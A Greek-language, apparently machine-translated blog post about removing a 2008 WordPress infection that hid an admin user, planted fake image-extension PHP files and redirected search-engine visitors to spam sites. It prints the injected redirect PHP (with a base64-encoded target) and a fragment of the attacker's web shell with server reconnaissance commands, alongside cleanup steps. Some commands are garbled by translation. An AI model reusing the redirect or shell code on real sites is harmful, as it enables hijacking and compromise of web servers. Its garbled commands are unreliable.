Τον τελευταίο μήνα, έχω λάβει προειδοποιήσεις του ιού στο blog από κάποιους επισκέπτες. Αρχικά αγνόησε τις προειδοποιήσεις, επειδή έχω εγκαταστήσει ένα αρκετά καλό antivirus (Kaspersky AV 2009) Και ακόμη blog για μεγάλο χρονικό διάστημα, ποτέ δεν έλαβε ειδοποίηση του ιού (εδώ και πολύ καιρό .. Είδα κάτι ύποπτο ότι η πρώτη ανανέωση εξαφανίστηκε. Τέλος ...).
Σιγά-σιγά άρχισαν να παρουσιάζουν μεγάλες διακυμάνσεις επισκεψιμότηταςΜετά την οποία πρόσφατα μειώθηκε σταθερά κυκλοφορίας και άρχισαν να είναι όλο και περισσότεροι άνθρωποι μου λένε ότι stealthsettings.com είναι virused. Χθες έλαβα από κάποιον ένα screenshot γίνεται όταν μπλοκάρει ένα antivirus γραφή από stealthsettings.com:Trojan-Clicker.HTML.IFrame.gr. Ήταν αρκετά πειστική για μένα, έτσι έβαλα όλες τις πηγές αναζήτηση. Η πρώτη ιδέα που μου ήρθε στο μυαλό ήταν να κάνει αναβάθμισης η τελευταία WordPress (2.5.1), αλλά όχι πριν διαγράψετε όλα τα αρχεία στο παλιό σενάριο WordPress και να φτιάξεις βάση δεδομένων αντιγράφων ασφαλείας. Αυτή η διαδικασία δεν λειτούργησε και μάλλον θα μου πήρε πολύ χρόνο για να καταλάβω πού ήταν το σφάλμα, αν δεν μου είχε πει. Eugen σε μια συζήτηση πέρα από τον καφέ, βρήκε σύνδεσμος Google και θα ήταν καλό να τον δω.
Το MyDigitalLife.info, δημοσίευσε ένα άρθρο με τίτλο: “WordPress Hack: Ανακτήστε και διορθώστε το Google και τη μηχανή αναζήτησης ή χωρίς επισκεψιμότητα cookie που ανακατευθύνεται στα Your-Needs.info, AnyResults.Net, Golden-Info.net και άλλους παράνομους ιστότοπους"Αυτό είναι το τέλος του νήματος που χρειαζόμουν.
Πρόκειται για μια εκμεταλλεύονται de WordPress με βάση τα cookiesΤο οποίο πιστεύω ότι είναι πολύ περίπλοκο και έκανε το βιβλίο. Clever αρκετό για να κάνει μια SQL Injection Βάση δεδομένων blog, για να δημιουργήσετε ένα αόρατο χρήστη ένας απλός έλεγχος ρουτίνας Πίνακας διαχείρισης->Χρήστες, ελέγξτε τους καταλόγους του διακομιστή και τα αρχεία "εγγράψιμος" (ότι chmod 777), για αναζήτηση και για εκτελέσει αρχεία με τα προνόμια της ομάδας ή τη ρίζα. Δεν ξέρω που εκμεταλλεύονται το όνομα και να δούμε ότι υπάρχουν λίγα άρθρα που έχουν γραφτεί γι 'αυτόν, παρά το γεγονός ότι πολλά blogs έχουν μολυνθεί, συμπεριλαμβανομένης της Ρουμανίας. Εντάξει ... Θα προσπαθήσω να προσπαθήσω να εξηγήσω γενικότητες σχετικά με τον ιό.
Τι είναι ιός;
Κατ 'αρχάς, τοποθετήστε τις σελίδες πηγές σχετικά με τα blogs, συνδέσεις αόρατα στους επισκέπτες, αλλά ορατό και δεικτοποιημένων για τις μηχανές αναζήτησης, κυρίως Google. Με τον τρόπο αυτό Σειρά τόπους μεταφοράς Page υποδεικνύεται από τον εισβολέα. Δεύτερον, παρεμβάλλεται ένα άλλο κώδικα ανακατεύθυνσης URL για τους επισκέπτες που έρχονται από το Google, Live, Yahoo, ... ή ένα RSS reader και όχι η θέση σε κουλουράκι. ένα προστασίας από ιούς ανιχνεύει την ανακατεύθυνση ως Trojan-Clicker.HTML.
Συμπτώματα:
Μειώθηκε μαζική κίνηση των επισκεπτώνΕιδικά για τα blogs, όπου οι περισσότεροι επισκέπτες έρχονται από το Google.
Αναγνώριση: (εδώ είναι που το πρόβλημα περιπλέκεται για όσους δεν γνωρίζουν πολλά για τα phpmyadmin, php και linux)
LA. ΠΡΟΣΟΧΗ! Πρώτα κάνει ένα αντίγραφο ασφαλείας της βάσης δεδομένων!
1. Ελέγξτε τα αρχεία προέλευσης index.php, header.php, footer.php, Το θέμα του blog και να δούμε αν υπάρχει ένας κωδικός που χρησιμοποιεί κρυπτογράφηση base64 ή περιέχει "if ($ ser ==" 1? && sizeof ($ _ COOKIE) == 0) "στη φόρμα:
<?php
$seref=array(”google”,”msn”,”live”,”altavista”,
”ask”,”yahoo”,”aol”,”cnn”,”weather”,”alexa”);
$ser=0; foreach($seref as $ref)
if(strpos(strtolower
($_SERVER[’HTTP_REFERER’]),$ref)!==false){ $ser=”1?; break; }
if($ser==”1? && sizeof($_COOKIE)==0){ header(”Location: http://”.base64_decode(”YW55cmVzdWx0cy5uZXQ=”).”/”); exit;
}?>Ή ... κάτι. Διαγράψτε τον κωδικό αυτό!
Κάντε κλικ στην εικόνα ...
Στο παραπάνω στιγμιότυπο, επέλεξα κατά λάθος και " " Αυτός ο κωδικός πρέπει να παραμείνει.
2. Χρήση phpMyAdmin και πηγαίνετε στο πίνακα της βάσης δεδομένων wp_usersΌταν ελέγξτε αν δεν υπάρχει το όνομα χρήστη που δημιουργήθηκε στις 00:00:00 0000-00-00 (Πιθανές στον τομέα user_login να γράψω "WordPress". Σημειώστε το αναγνωριστικό αυτού του χρήστη (πεδίο ID) και, στη συνέχεια, διαγράψτε το.
Κάντε κλικ στην εικόνα ...
* Η πράσινη γραμμή θα πρέπει να αφαιρεθεί και να διατηρήσει την ταυτότητά του. Στην περίπτωση του νυσταγμένοςΉταν ID = 8 .
3. Πηγαίνετε στον πίνακα wp_usermeta, Όταν σας βρίσκεται και διαγράψετε γραμμές για την ταυτότητα (όπου το πεδίο user_id ID αξία αφαιρείται).
4. Στον Πίνακα wp_option, Go active_plugins και να δούμε τι plugin είναι ενεργοποιημένη ύποπτος. Μπορεί να χρησιμοποιηθεί σαν καταλήξεις _old.giff, _old.pngg, _old.jpeg, _new.php.giff, κ.λπ. συνδυασμοί εμπλουτισμένων επεκτάσεων εικόνας με _old και _new.
SELECT * FROM wp_options WHERE option_name = 'active_plugins'Διαγράψτε αυτήν την προσθήκη και μετά μεταβείτε στο ιστολόγιο -> Πίνακας ελέγχου -> Πρόσθετα, όπου απενεργοποιείτε και ενεργοποιείτε οποιαδήποτε προσθήκη.
Κάντε κλικ στην εικόνα για να δείτε φαίνεται active_plugins αρχείο του ιού.
Ακολουθήστε το μονοπάτι για το FTP ή SSH, που αναφέρεται στο active_plugins και να διαγράψετε το αρχείο από το διακομιστή.
5. Επίσης στο phpMyAdmin, στον πίνακα wp_option, Βρείτε και διαγράψτε τη γραμμή που περιέχει "rss_f541b3abd05e7962fcab37737f40fad8«Και»internal_links_cache ".
Σε internal_links_cache, προσφέρονται κρυπτογραφημένα συνδέσεις spam που εμφανίζονται σε ένα blog κωδικός του Google Adsαυχένας, Ο χάκερ.
6. Είναι συνιστάται να αλλάξετε τον κωδικό πρόσβασης Blog και σύνδεσης αφαιρέστε όλες τις ύποπτες userele. Αναβάθμιση στην πιο πρόσφατη έκδοση του WordPress και ρυθμίστε το ιστολόγιο ώστε να μην επιτρέπει πλέον την εγγραφή νέων χρηστών. Δεν υπάρχει απώλεια… μπορεί επίσης να σχολιάσει ακατοίκητο.
Προσπάθησα παραπάνω να εξηγήσω λίγο, τι να κάνω σε μια τέτοια κατάσταση, για να καθαρίσω το blog αυτού του ιού. Το πρόβλημα είναι πολύ πιο σοβαρό από ό, τι φαίνεται και δεν έχει σχεδόν λυθεί, επειδή χρησιμοποιούνται τρωτά σημεία της ασφάλειας φιλοξενεί τον web server, το οποίο είναι το blog.
Ως πρώτο μέτρο ασφαλείας, με πρόσβαση SSH, Κάντε ορισμένους ελέγχους στο διακομιστή για να δείτε αν υπάρχουν αρχεία όπως * _OLD * και * _New. * Με καταλήξεις.GIFF,. jpeg,. pngg,. jpgg. Αυτά τα αρχεία θα πρέπει να διαγράφονται. Εάν μετονομάσετε ένα αρχείο, για παράδειγμα. top_right_old.giff in top_right_old.phpΒλέπουμε ότι το αρχείο είναι ακριβώς ο server κώδικα εκμεταλλεύονται.
Ορισμένες χρήσιμες οδηγίες για τον έλεγχο, τον καθαρισμό και την ασφάλεια του διακομιστή. (μέσω SSH)
1. cd / tmp και ελέγξτε αν υπάρχουν φάκελοι, όπως tmpVFlma ή οποιαδήποτε άλλη ονομασία asemenatoare συνδυασμούς και να το διαγράψετε. Δείτε το παρακάτω στιγμιότυπο, δύο τέτοια φακέλους για μένα:
rm-rf όνομα_φακέλου
2. Ελέγξτε και εξαλείψτε (αλλαγή chmod-ul) όσο το δυνατόν οι φάκελοι με χαρακτηριστικά chmod 777
βρείτε όλα τα εγγράψιμα αρχεία στην τρέχουσα διεύθυνση: Εύρεση. -Type f-perm-2-ls
βρείτε όλα τα εγγράψιμο καταλόγους στην τρέχουσα dir: Εύρεση. Τύπος-d-περμανάντ-2-ls
βρείτε όλους τους καταλόγους και τα αρχεία με δυνατότητα εγγραφής στην τρέχουσα διεύθυνση: Εύρεση. -Perm-2-ls
3. Ψάχνετε για ύποπτα αρχεία στον server.
find . -name "*_new.php*"
find . -name "*_old.php*"
find . -name "*.jpgg"
find . -name "*_giff"
find . -name "*_pngg"4, ΠΡΟΣΟΧΗ! τα αρχεία που έχουν θέσει λίγο SUID si SGID. Αυτά τα αρχεία εκτελούν με τα προνόμια του χρήστη (ομάδα) ή ρίζα, όχι ο χρήστης που εκτελεί το αρχείο. Αυτά τα αρχεία μπορούν να οδηγήσουν σε συμβιβασμό ρίζα, αν τα θέματα ασφάλειας. Εάν δεν χρησιμοποιήσετε τα SUID και SGID αρχεία με λίγο, εκτελεί »chmod 0 " τους ή να καταργήσετε την εγκατάσταση του πακέτου που περιέχει τους.
Εκμεταλλευτείτε περιέχει κάπου στην πηγή ...:
if(!$safe_mode){
if($os_type == 'nix'){
$os .= execute('sysctl -n kern.ostype');
$os .= execute('sysctl -n kern.osrelease');
$os .= execute('sysctl -n kernel.ostype');
$os .= execute('sysctl -n kernel.osrelease');
if(empty($user)) $user = execute('id');
$aliases = array(
'' => '',
'find suid files'=>'find / -type f -perm -04000 -ls',
'find sgid files'=>'find / -type f -perm -02000 -ls',
'find all writable files in current dir'=>'find . -type f -perm -2 -ls',
'find all writable directories in current dir'=>'find . -type d -perm -2 -ls',
'find all writable directories and files in current dir'=>'find . -perm -2 -ls',
'show opened ports'=>'netstat -an | grep -i listen',
);
}else{
$os_name .= execute('ver');
$user .= execute('echo %username%');
$aliases = array(
'' => '',
'show runing services' => 'net start',
'show process list' => 'tasklist'
);
}Βρίσκει αυτόν τον τρόπο ... βασικά παραβιάσεις της ασφάλειας. Λιμάνια άνοιγμα του καταλόγου "εγγράψιμος" και η ομάδα προνόμια εκτέλεση αρχείων / root.
Επιστροφή με περισσότερα ...
Ορισμένα blogs έχουν μολυνθεί: www.blegoo.com, www.visurat.ro,
fulgerica.com, denisuca.com, www.ecostin.com,
www.razvanmatasel.ro,
blog.hrmarket.ro, www.nitza.ro,
motorcycles.motomag.ro,
emi.brainient.com, www.picsel.ro,
www.mihaidragan.ro/kindablog/,
krumel.seo-point.com, www.itex.ro/blog,
www.radiology.ro,
www.dipse.ro/ionut/,
www.vinul.ro/blog/, www.damaideparte.ro,
dragos.roua.ro, www.artistul.ro/blog/,
www.mirabilismedia.ro/blog, blog.einvest.ro
... Ο κατάλογος συνεχίζεται ... πολλά.
Μπορείτε να ελέγξετε εάν ένα ιστολόγιο έχει μολυνθεί χρησιμοποιώντας τη μηχανή αναζήτησης Google. αντιγραφή επικόλληση:
Ιστοσελίδα: buy www.blegoo.com
Καληνύχτα και καλή δουλειά;) Σύντομα νομίζω ότι ο Eugen θα έρθει με νέα, στο prevezibil.imprevizibil.com
brb :)
ΠΡΟΣΟΧΗ! Αλλαγή του θέματος του WordPress ή αναβάθμιση σε WordPress 2.5.1, ΔΕΝ είναι λύση για να απαλλαγείτε από αυτόν τον ιό.
